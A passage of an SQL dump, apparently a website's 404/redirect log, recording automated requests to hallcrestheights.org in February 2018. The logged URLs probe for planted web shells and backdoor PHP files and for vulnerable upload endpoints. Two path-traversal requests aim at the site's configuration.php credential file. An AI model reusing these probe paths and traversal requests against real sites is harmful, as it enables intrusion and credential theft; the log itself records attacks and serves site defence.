00:00:00'),(13858,'http://hallcrestheights.org/modules/mod_stats/tmpl/wso2.php',NULL,'http://site.ru','',1,0,'2018-02-09 08:48:51','0000-00-00 00:00:00'),(13859,'http://hallcrestheights.org/components/com_foxcontact/07.php',NULL,'http://site.ru','',1,0,'2018-02-09 08:54:32','0000-00-00 00:00:00'),(13860,'http://hallcrestheights.org/libraries/phputf8/str_parser.php',NULL,'http://site.ru','',1,0,'2018-02-09 08:58:09','0000-00-00 00:00:00'),(13861,'http://hallcrestheights.org/modules/mod_login/log.php.php',NULL,'http://site.ru','',1,0,'2018-02-09 08:59:59','0000-00-00 00:00:00'),(13862,'http://hallcrestheights.org/page.php',NULL,'http://site.ru','',2,0,'2018-02-09 09:34:31','0000-00-00 00:00:00'),(13863,'http://hallcrestheights.org/modules/mod_search/updates.php',NULL,'http://site.ru','',1,0,'2018-02-09 09:36:58','0000-00-00 00:00:00'),(13864,'http://hallcrestheights.org/language/lv-LV/lv-LV.localise2.php',NULL,'http://site.ru','',1,0,'2018-02-09 11:00:52','0000-00-00 00:00:00'),(13865,'http://hallcrestheights.org/modules/mod_defender/tmpl/template.php',NULL,'http://site.ru','',1,0,'2018-02-09 11:55:23','0000-00-00 00:00:00'),(13866,'http://hallcrestheights.org/gallery.php',NULL,'http://site.ru','',1,0,'2018-02-09 11:57:54','0000-00-00 00:00:00'),(13867,'http://www.hallcrestheights.org/joomla//components/com_b2jcontact/index.html',NULL,'','',1,0,'2018-02-09 12:06:02','0000-00-00 00:00:00'),(13868,'http://hallcrestheights.org/data.php',NULL,'http://site.ru','',1,0,'2018-02-09 16:42:46','0000-00-00 00:00:00'),(13869,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.4/cache.php',NULL,'http://site.ru','',1,0,'2018-02-09 16:59:02','0000-00-00 00:00:00'),(13870,'http://hallcrestheights.org/ass.php',NULL,'http://site.ru','',2,0,'2018-02-09 17:07:31','0000-00-00 00:00:00'),(13871,'http://hallcrestheights.org/plugins/system/plg_system_rewrite/copyright.php',NULL,'http://site.ru','',2,0,'2018-02-09 17:07:41','0000-00-00 00:00:00'),(13872,'http://hallcrestheights.org/plugins/content/geshi/geshi/geshi/geshi.php',NULL,'http://site.ru','',1,0,'2018-02-09 18:29:23','0000-00-00 00:00:00'),(13873,'http://hallcrestheights.org/therm.php',NULL,'http://site.ru','',1,0,'2018-02-09 19:29:24','0000-00-00 00:00:00'),(13874,'http://hallcrestheights.org/assets/images/content-post.php',NULL,'http://site.ru','',1,0,'2018-02-09 20:05:19','0000-00-00 00:00:00'),(13875,'http://hallcrestheights.org/scc.php',NULL,'http://site.ru','',1,0,'2018-02-09 21:37:36','0000-00-00 00:00:00'),(13876,'http://hallcrestheights.org/libraries/phputf8/utils/urlencode.php?id=event',NULL,'hallcrestheights.org','',1,0,'2018-02-09 22:07:29','0000-00-00 00:00:00'),(13877,'http://hallcrestheights.org/components/com_wrapper/views/wrapper/wrapper.php',NULL,'http://site.ru','',3,0,'2018-02-09 22:19:18','0000-00-00 00:00:00'),(13878,'http://hallcrestheights.org/cli/cli.php',NULL,'http://site.ru','',2,0,'2018-02-09 22:18:26','0000-00-00 00:00:00'),(13879,'http://hallcrestheights.org/components/com_jooomlat/s.php',NULL,'http://site.ru','',1,0,'2018-02-09 23:05:26','0000-00-00 00:00:00'),(13880,'http://hallcrestheights.org/wp-blog-posts.php',NULL,'http://site.ru','',1,0,'2018-02-09 23:18:01','0000-00-00 00:00:00'),(13881,'http://hallcrestheights.org/food.php',NULL,'http://site.ru','',1,0,'2018-02-10 00:32:29','0000-00-00 00:00:00'),(13882,'http://hallcrestheights.org/modules/mod_articles_tags/tmpl/mide.php',NULL,'http://site.ru','',1,0,'2018-02-10 01:24:35','0000-00-00 00:00:00'),(13883,'http://hallcrestheights.org/categories.php',NULL,'http://site.ru','',2,0,'2018-02-10 01:27:46','0000-00-00 00:00:00'),(13884,'http://hallcrestheights.org/language/lv-LV/lv-LV.localise4.php',NULL,'http://site.ru','',1,0,'2018-02-10 01:46:16','0000-00-00 00:00:00'),(13885,'http://hallcrestheights.org/pasts.php',NULL,'http://site.ru','',2,0,'2018-02-10 01:53:10','0000-00-00 00:00:00'),(13886,'http://hallcrestheights.org/libraries/simplepie/idn/idnb_convert.class.php',NULL,'http://site.ru','',2,0,'2018-02-10 02:47:07','0000-00-00 00:00:00'),(13887,'http://hallcrestheights.org/images/stories/ar.php',NULL,'http://site.ru','',2,0,'2018-02-10 03:15:40','0000-00-00 00:00:00'),(13888,'http://hallcrestheights.org/modules/mod_helper/mod_helper.php',NULL,'http://site.ru','',1,0,'2018-02-10 03:28:55','0000-00-00 00:00:00'),(13889,'http://hallcrestheights.org/includes/img/mode.php',NULL,'http://site.ru','',2,0,'2018-02-10 03:55:23','0000-00-00 00:00:00'),(13890,'http://hallcrestheights.org/libraries/joomla/database/importer/wkism.php',NULL,'http://site.ru','',1,0,'2018-02-10 03:57:11','0000-00-00 00:00:00'),(13891,'http://hallcrestheights.org/components/com_foxcontact/w.php',NULL,'http://site.ru','',1,0,'2018-02-10 04:41:05','0000-00-00 00:00:00'),(13892,'http://hallcrestheights.org/language/en-GB/language.php',NULL,'http://site.ru','',1,0,'2018-02-10 07:35:10','0000-00-00 00:00:00'),(13893,'http://hallcrestheights.org/customizer.php',NULL,'http://site.ru','',2,0,'2018-02-10 07:41:13','0000-00-00 00:00:00'),(13894,'http://hallcrestheights.org/plugins/system/CssJsCompress/js.php?js=../../configuration.php',NULL,'','',1,0,'2018-02-10 08:17:38','0000-00-00 00:00:00'),(13895,'http://hallcrestheights.org/components/com_docman/dl2.php?archive=0&file=../../configuration.php',NULL,'','',1,0,'2018-02-10 08:17:46','0000-00-00 00:00:00'),(13896,'http://hallcrestheights.org/templates/beez/banner.php',NULL,'http://site.ru','',1,0,'2018-02-10 08:21:48','0000-00-00 00:00:00'),(13897,'http://hallcrestheights.org/libraries/joomla/linkedin/local.php',NULL,'http://site.ru','',2,0,'2018-02-10 08:49:45','0000-00-00 00:00:00'),(13898,'http://hallcrestheights.org/Babbitts.php',NULL,'http://site.ru','',1,0,'2018-02-10 08:54:50','0000-00-00 00:00:00'),(13899,'http://hallcrestheights.org/libraries/joomla/template/mide.php',NULL,'http://site.ru','',2,0,'2018-02-10 08:54:59','0000-00-00 00:00:00'),(13900,'http://hallcrestheights.org/media/index.php',NULL,'http://site.ru','',2,0,'2018-02-10 08:56:25','0000-00-00 00:00:00'),(13901,'http://hallcrestheights.org/components/com_finder/controllers/controllers.php',NULL,'http://site.ru','',3,0,'2018-02-10 09:27:35','0000-00-00 00:00:00'),(13902,'http://hallcrestheights.org/plugins/editors/tinymce/version.php',NULL,'http://site.ru','',1,0,'2018-02-10 09:46:31','0000-00-00 00:00:00'),(13903,'http://hallcrestheights.org/wp-content/bk.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2018-02-10 10:21:36','0000-00-00 00:00:00'),(13904,'http://hallcrestheights.org/images/1ndex.php?z3=U01ranhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:22:51','0000-00-00 00:00:00'),(13905,'http://hallcrestheights.org/cache/cachee.php?z3=U01ranhhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:25:43','0000-00-00 00:00:00'),(13906,'http://hallcrestheights.org/maill.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:27:51','0000-00-00 00:00:00'),(13907,'http://hallcrestheights.org/wp-cache.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:28:19','0000-00-00 00:00:00'),(13908,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:31:37','0000-00-00 00:00:00'),(13909,'http://hallcrestheights.org/SessionController.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:32:06','0000-00-00 00:00:00'),(13910,'http://hallcrestheights.org/webconfig.txt.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:33:07','0000-00-00 00:00:00'),(13911,'http://hallcrestheights.org/robots.txt.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:35:42','0000-00-00 00:00:00'),(13912,'http://hallcrestheights.org/sql_dump.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:37:09','0000-00-00 00:00:00'),(13913,'http://hallcrestheights.org/jconfig.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:37:38','0000-00-00 00:00:00'),(13914,'http://hallcrestheights.org/thumb.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:36:40','0000-00-00 00:00:00'),(13915,'http://hallcrestheights.org/al277.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:40:48','0000-00-00 00:00:00'),(13916,'http://hallcrestheights.org/images/al277.php?z3=U01ranhhLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:41:13','0000-00-00 00:00:00'),(13917,'http://hallcrestheights.org/wsdl.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:41:43','0000-00-00 00:00:00'),(13918,'http://hallcrestheights.org/wp-data.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:42:11','0000-00-00 00:00:00'),(13919,'http://hallcrestheights.org/media/1ndex.php?z3=U01ranhhLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:44:57','0000-00-00 00:00:00'),(13920,'http://hallcrestheights.org/media/tmp.php?z3=U01ranhhLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:45:28','0000-00-00 00:00:00'),(13921,'http://hallcrestheights.org/google-assist.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:47:27','0000-00-00 00:00:00'),(13922,'http://hallcrestheights.org/elements.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:49:54','0000-00-00 00:00:00'),(13923,'http://hallcrestheights.org/cache/defau1t.php?z3=U01ranhhLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:49:00','0000-00-00 00:00:00'),(13924,'http://hallcrestheights.org/modules/mod_tags_similar/userloader.php',NULL,'http://site.ru','',2,0,'2018-02-10 10:49:01','0000-00-00 00:00:00'),(13925,'http://hallcrestheights.org/roubt.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:50:52','0000-00-00 00:00:00'),(13926,'http://hallcrestheights.org/bookmark.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:51:19','0000-00-00 00:00:00'),(13927,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2018-02-10 10:51:32','0000-00-00 00:00:00'),(13928,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:54:58','0000-00-00 00:00:00'),(13929,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:59:41','0000-00-00 00:00:00'),(13930,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 10:59:13','0000-00-00 00:00:00'),(13931,'http://hallcrestheights.org/A.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-02-10 11:02:27','0000-00-00 00:00:00'),(13932,'http://hallcrestheights.org/modules/modules/modules.php?z3=U01ranhhLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',1,0,'2018-02-10 11:02:03','0000-00-00 00:00:00'),(13933,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:03:34','0000-00-00 00:00:00'),(13934,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:03:58','0000-00-00 00:00:00'),(13935,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:04:19','0000-00-00 00:00:00'),(13936,'http://hallcrestheights.org/images/stories/0day.php?z3=U01ranhhLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:06:33','0000-00-00 00:00:00'),(13937,'http://hallcrestheights.org/install.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:08:15','0000-00-00 00:00:00'),(13938,'http://hallcrestheights.org/xmlsrpc.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:11:12','0000-00-00 00:00:00'),(13939,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=U01ranhhLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:11:26','0000-00-00 00:00:00'),(13940,'http://hallcrestheights.org/shootmei.php?z3=U01ranhhLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-02-10 11:11:37','0000-00-00 00:00:00'),(13941,'http://hallcrestheights.org/hexhglal.php',NULL,'http://site.ru','',1,0,'2018-02-11 07:13:31','0000-00-00 00:00:00'),(13942,'http://www.hallcrestheights.org/components/com_b2jcontact/index.html',NULL,'','',1,0,'2018-02-12 13:00:01','0000-00-00 00:00:00'),(13943,'http://hallcrestheights.org/cli/851.php',NULL,'http://site.ru','',1,0,'2018-02-12 14:09:18','0000-00-00 00:00:00'),(13944,'https://hallcrestheights.org/templates/index.php',NULL,'hallcrestheights.org','',1,0,'2018-02-12 15:53:25','0000-00-00 00:00:00'),(13945,'http://hallcrestheights.org/modules/homepageadvertise/uploadimage.php',NULL,'','',2,0,'2018-02-15 12:06:39','0000-00-00 00:00:00'),(13946,'http://hallcrestheights.org/modules/wdoptionpanel/wdoptionpanel_ajax.php',NULL,'','',2,0,'2018-02-15 12:06:33','0000-00-00 00:00:00'),(13947,'http://hallcrestheights.org/modules/pk_flexmenu/ajax/upload.php',NULL,'','',1,0,'2018-02-15 12:08:19','0000-00-00 00:00:00'),(13948,'http://hallcrestheights.org/modules/homepageadvertise2/uploadimage.php',NULL,'','',1,0,'2018-02-15 12:08:46','0000-00-00 00:00:00'),(13949,'http://hallcrestheights.org/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&Month=02',NULL,'','',2,0,'2018-02-15 12:08:54','0000-00-00 00:00:00'),(13950,'http://hallcrestheights.org/modules/pk_vertflexmenu/ajax/upload.php',NULL,'','',1,0,'2018-02-15 12:08:59','0000-00-00 00:00:00'),(13951,'http://hallcrestheights.org/modules/vtemslideshow/uploadimage.php',NULL,'','',2,0,'2018-02-15 12:09:09','0000-00-00 00:00:00'),(13952,'http://hallcrestheights.org/modules/megamenu/uploadify/uploadify.php?id=fzzxa.php.png',NULL,'','',1,0,'2018-02-15 12:07:52','0000-00-00 00:00:00'),(13953,'http://hallcrestheights.org/modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2018-02-15 12:07:56','0000-00-00 00:00:00'),(13954,'http://hallcrestheights.org/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage&id_slide=php',NULL,'','',1,0,'2018-02-15 12:09:44','0000-00-00 00:00:00'),(13955,'http://hallcrestheights.org/modules/homepageadvertise/slides/ppwo5.php',NULL,'','',2,0,'2018-02-15 12:09:59','0000-00-00 00:00:00'),(13956,'http://hallcrestheights.org/modules/columnadverts/uploadimage.php',NULL,'','',1,0,'2018-02-15 12:10:04','0000-00-00 00:00:00'),(13957,'http://hallcrestheights.org/modules/pk_flexmenu/uploads/gqkEo.php',NULL,'','',1,0,'2018-02-15 12:09:20','0000-00-00 00:00:00'),(13958,'http://hallcrestheights.org//wp-content/plugins/dzs-portfolio/upload.php',NULL,'','',1,0,'2018-02-15 12:19:12','0000-00-00 00:00:00'),(13959,'http://hallcrestheights.org/components/com_jce/jce.php',NULL,'','',2,0,'2018-02-17 10:22:06','0000-00-00 00:00:00'),(13960,'http://hallcrestheights.org/wp-content/uploads/wpallimport/uploads/',NULL,'','',1,0,'2018-02-17 10:25:30','0000-00-00 00:00:00'),(13961,'http://hallcrestheights.org/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',2,0,'2018-02-17 10:30:32','0000-00-00 00:00:00'),(13962,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/thumbs.php',NULL,'http://site.ru','',1,0,'2018-02-17 17:52:37','0000-00-00 00:00:00'),(13963,'http://hallcrestheights.org/logs/errors.php',NULL,'http://site.ru','',1,0,'2018-02-18 08:44:06','0000-00-00 00:00:00'),(13964,'http://hallcrestheights.org/old_index.php',NULL,'http://site.ru','',1,0,'2018-02-18 09:05:22','0000-00-00 00:00:00'),(13965,'http://hallcrestheights.org/wp-auto.php',NULL,'http://site.ru','',3,0,'2018-02-18 09:09:53','0000-00-00 00:00:00'),(13966,'http://hallcrestheights.org/media/system.php',NULL,'http://site.ru','',2,0,'2018-02-18 09:35:28','0000-00-00 00:00:00'),(13967,'http://hallcrestheights.org/templates/6.php',NULL,'http://site.ru','',2,0,'2018-02-18 10:12:44','0000-00-00 00:00:00'),(13968,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/langs/langs.php',NULL,'http://site.ru','',1,0,'2018-02-18 10:56:51','0000-00-00 00:00:00'),(13969,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/o2k7.php',NULL,'http://site.ru','',1,0,'2018-02-18 11:00:10','0000-00-00 00:00:00'),(13970,'http://hallcrestheights.org/libraries/phpmailer/pop.php',NULL,'http://site.ru','',1,0,'2018-02-18 11:32:05','0000-00-00 00:00:00'),(13971,'http://hallcrestheights.org/includes/configurati0n.php',NULL,'http://site.ru','',1,0,'2018-02-18 12:25:17','0000-00-00 00:00:00'),(13972,'http://hallcrestheights.org/searchterm.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:17:05','0000-00-00 00:00:00'),(13973,'http://hallcrestheights.org/media/media/default.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:53:59','0000-00-00 00:00:00'),(13974,'http://hallcrestheights.org/components/com_b2jcontact/wp13.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:53:03','0000-00-00 00:00:00'),(13975,'http://hallcrestheights.org/components/com_support/support.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:56:45','0000-00-00 00:00:00'),(13976,'http://hallcrestheights.org/tmp/images2.php',NULL,'http://site.ru','',5,0,'2018-02-18 14:10:17','0000-00-00 00:00:00'),(13977,'http://hallcrestheights.org/components/com_foxcontact/532245123100.php',NULL,'http://site.ru','',3,0,'2018-02-18 14:25:08','0000-00-00 00:00:00'),(13978,'http://hallcrestheights.org/templates/beez5/css/css.php',NULL,'http://site.ru','',1,0,'2018-02-18 15:02:16','0000-00-00 00:00:00'),(13979,'http://hallcrestheights.org/old/wp-content/plugins/easyrotator-for-wordpress/Marvins.php',NULL,'http://site.ru','',3,0,'2018-02-18 16:07:52','0000-00-00 00:00:00'),(13980,'http://hallcrestheights.org/cache/sok/s.php',NULL,'http://site.ru','',1,0,'2018-02-18 16:11:56','0000-00-00 00:00:00'),(13981,'http://hallcrestheights.org/logs/old_log.php',NULL,'http://site.ru','',1,0,'2018-02-18 16:37:22','0000-00-00 00:00:00'),(13982,'http://hallcrestheights.org/plugins/editors/tinymce/templates/xml.php',NULL,'http://site.ru','',1,0,'2018-02-18 17:09:55','0000-00-00 00:00:00'),(13983,'http://hallcrestheights.org/cache/cleanup.php',NULL,'http://site.ru','',2,0,'2018-02-18 17:32:19','0000-00-00 00:00:00'),(13984,'http://hallcrestheights.org/components/com_newsfeeds/1.php',NULL,'http://site.ru','',1,0,'2018-02-18 17:34:13','0000-00-00 00:00:00'),(13985,'http://hallcrestheights.org/404/y.php',NULL,'http://site.ru','',2,0,'2018-02-18 18:00:32','0000-00-00 00:00:00'),(13986,'http://hallcrestheights.org/libraries/joomla/database/bclass.php?c=md5&f=2343534',NULL,'hallcrestheights.org','',1,0,'2018-02-20 10:22:48','0000-00-00 00:00:00'),(13987,'http://hallcrestheights.org/Gfedew.php',NULL,'http://site.ru','',1,0,'2018-02-20 12:53:00','0000-00-00 00:00:00'),(13988,'http://hallcrestheights.org/ciosans.php',NULL,'http://site.ru','',2,0,'2018-02-20 13:12:31','0000-00-00 00:00:00'),(13989,'http://hallcrestheights.org/bubus.php',NULL,'http://site.ru','',3,0,'2018-02-21 12:23:37','0000-00-00 00:00:00'),(13990,'http://hallcrestheights.org/kadvl.php',NULL,'http://site.ru','',3,0,'2018-02-21 21:21:56','0000-00-00 00:00:00'),(13991,'http://hallcrestheights.org/cool.php',NULL,'http://site.ru','',1,0,'2018-02-21 21:23:51','0000-00-00 00:00:00'),(13992,'http://hallcrestheights.org/fianetfraud/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-21 22:06:20','0000-00-00 00:00:00'),(13993,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/fullscreen/htaccess.php',NULL,'http://site.ru','',1,0,'2018-02-21 22:13:13','0000-00-00 00:00:00'),(13994,'http://hallcrestheights.org/mixi.php',NULL,'http://site.ru','',3,0,'2018-02-22 02:11:38','0000-00-00 00:00:00'),(13995,'http://hallcrestheights.org/images/logs.php',NULL,'http://site.ru','',1,0,'2018-02-22 02:27:39','0000-00-00 00:00:00'),(13996,'http://hallcrestheights.org/components/com_finder/models/models.php',NULL,'http://site.ru','',1,0,'2018-02-22 03:09:36','0000-00-00 00:00:00'),(13997,'http://hallcrestheights.org/templates/rhuk_milkyway/images/orange/jbqfc.php',NULL,'http://site.ru','',2,0,'2018-02-22 08:11:35','0000-00-00 00:00:00'),(13998,'http://hallcrestheights.org/templates/jblank/html/com_content/form/form.php',NULL,'http://site.ru','',5,0,'2018-02-22 08:16:39','0000-00-00 00:00:00'),(13999,'http://hallcrestheights.org/templates/jblank/language/ru-RU/ru-RU.php',NULL,'http://site.ru','',1,0,'2018-02-22 08:46:16','0000-00-00 00:00:00'),(14000,'http://hallcrestheights.org/templates/atomic/atomic.php',NULL,'http://site.ru','',2,0,'2018-02-22 08:47:20','0000-00-00 00:00:00'),(14001,'http://hallcrestheights.org/templates/jblank/img/images/prettyPhoto/dark_square/dark_square.php',NULL,'http://site.ru','',3,0,'2018-02-22 08:50:03','0000-00-00 00:00:00'),(14002,'http://hallcrestheights.org/templates/jblank/html/mod_footer/mod_footer.php',NULL,'http://site.ru','',1,0,'2018-02-22 09:59:46','0000-00-00 00:00:00'),(14003,'http://hallcrestheights.org/templates/jblank/html/com_content/archive/archive.php',NULL,'http://site.ru','',1,0,'2018-02-22 11:07:31','0000-00-00 00:00:00'),(14004,'http://hallcrestheights.org/Eouds.php',NULL,'http://site.ru','',2,0,'2018-02-22 11:35:27','0000-00-00 00:00:00'),(14005,'http://hallcrestheights.org/modules/mod_yoo_gallery/yoo_gallery/lib/debug.php',NULL,'http://site.ru','',2,0,'2018-02-22 11:38:34','0000-00-00 00:00:00'),(14006,'http://hallcrestheights.org/Sherwoods.php',NULL,'http://site.ru','',1,0,'2018-02-22 12:28:29','0000-00-00 00:00:00'),(14007,'http://hallcrestheights.org/plugins/quickicon/quickicon.php',NULL,'http://site.ru','',2,0,'2018-02-22 15:32:57','0000-00-00 00:00:00'),(14008,'http://hallcrestheights.org/templates/jblank/img/images/prettyPhoto/dark_rounded/dark_rounded.php',NULL,'http://site.ru','',2,0,'2018-02-22 16:18:38','0000-00-00 00:00:00'),(14009,'http://hallcrestheights.org/templates/jblank/html/mod_banners/mod_banners.php',NULL,'http://site.ru','',2,0,'2018-02-22 16:49:31','0000-00-00 00:00:00'),(14010,'http://hallcrestheights.org/templates/atomic/language/language.php',NULL,'http://site.ru','',2,0,'2018-02-22 17:03:20','0000-00-00 00:00:00'),(14011,'http://hallcrestheights.org/templates/atomic/html/mod_custom/mod_custom.php',NULL,'http://site.ru','',2,0,'2018-02-22 18:35:25','0000-00-00 00:00:00'),(14012,'http://hallcrestheights.org/modules/mod_articles_categories/tmpl/tmpl.php',NULL,'http://site.ru','',2,0,'2018-02-22 20:10:09','0000-00-00 00:00:00'),(14013,'http://hallcrestheights.org/templates/atomic/css/blueprint/src/src.php',NULL,'http://site.ru','',2,0,'2018-02-22 20:11:32','0000-00-00 00:00:00'),(14014,'http://hallcrestheights.org/templates/jblank/html/mod_users_latest/mod_users_latest.php',NULL,'http://site.ru','',1,0,'2018-02-22 20:24:00','0000-00-00 00:00:00'),(14015,'http://hallcrestheights.org/templates/atomic/css/blueprint/plugins/link-icons/icons/icons.php',NULL,'http://site.ru','',1,0,'2018-02-22 21:48:21','0000-00-00 00:00:00'),(14016,'http://hallcrestheights.org/templates/atomic/css/blueprint/plugins/buttons/icons/icons.php',NULL,'http://site.ru','',2,0,'2018-02-22 22:23:24','0000-00-00 00:00:00'),(14017,'http://hallcrestheights.org/wp-xmlrpc.php',NULL,'http://site.ru','',2,0,'2018-02-22 23:19:07','0000-00-00 00:00:00'),(14018,'http://hallcrestheights.org/templates/jblank/html/com_contact/com_contact.php',NULL,'http://site.ru','',2,0,'2018-02-22 23:27:35','0000-00-00 00:00:00'),(14019,'http://hallcrestheights.org/templates/jblank/html/mod_search/mod_search.php',NULL,'http://site.ru','',1,0,'2018-02-23 00:58:23','0000-00-00 00:00:00'),(14020,'http://hallcrestheights.org/sizings.php',NULL,'http://site.ru','',2,0,'2018-02-23 01:06:21','0000-00-00 00:00:00'),(14021,'http://hallcrestheights.org/templates/jblank/html/com_mailto/mailto/mailto.php',NULL,'http://site.ru','',3,0,'2018-02-23 01:57:05','0000-00-00 00:00:00'),(14022,'http://hallcrestheights.org/templates/jblank/html/mod_weblinks/mod_weblinks.php',NULL,'http://site.ru','',1,0,'2018-02-23 02:06:45','0000-00-00 00:00:00'),(14023,'http://hallcrestheights.org/templates/jblank/img/images/prettyPhoto/light_square/light_square.php',NULL,'http://site.ru','',2,0,'2018-02-23 02:25:07','0000-00-00 00:00:00'),(14024,'http://hallcrestheights.org/wp-wpphp.php',NULL,'http://site.ru','',1,0,'2018-02-23 02:28:57','0000-00-00 00:00:00'),(14025,'http://hallcrestheights.org/templates/beez5/html/com_content/categories/categories.php',NULL,'http://site.ru','',2,0,'2018-02-23 04:47:46','0000-00-00 00:00:00'),(14026,'http://hallcrestheights.org/tmp/tmp.php',NULL,'http://site.ru','',2,0,'2018-02-23 04:50:04','0000-00-00 00:00:00'),(14027,'http://hallcrestheights.org/modules/mod_wrapper/tmpl/tmpl.php',NULL,'http://site.ru','',2,0,'2018-02-23 06:21:23','0000-00-00 00:00:00'),(14028,'http://hallcrestheights.org/templates/beez_20/images/nature/nature.php',NULL,'http://site.ru','',1,0,'2018-02-23 06:22:39','0000-00-00 00:00:00'),(14029,'http://hallcrestheights.org/upgrades.php',NULL,'http://site.ru','',2,0,'2018-02-23 08:31:42','0000-00-00 00:00:00'),(14030,'http://hallcrestheights.org/templates/atomic/css/blueprint/plugins/link-icons/link-icons.php',NULL,'http://site.ru','',1,0,'2018-02-23 08:38:38','0000-00-00 00:00:00'),(14031,'http://hallcrestheights.org/plugins/captcha/captcha.php',NULL,'http://site.ru','',1,0,'2018-02-23 08:53:53','0000-00-00 00:00:00'),(14032,'http://hallcrestheights.org/templates/beez5/html/html.php',NULL,'http://site.ru','',1,0,'2018-02-23 08:52:37','0000-00-00 00:00:00'),(14033,'http://hallcrestheights.org/modules/mod_users_latest/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-23 09:51:05','0000-00-00 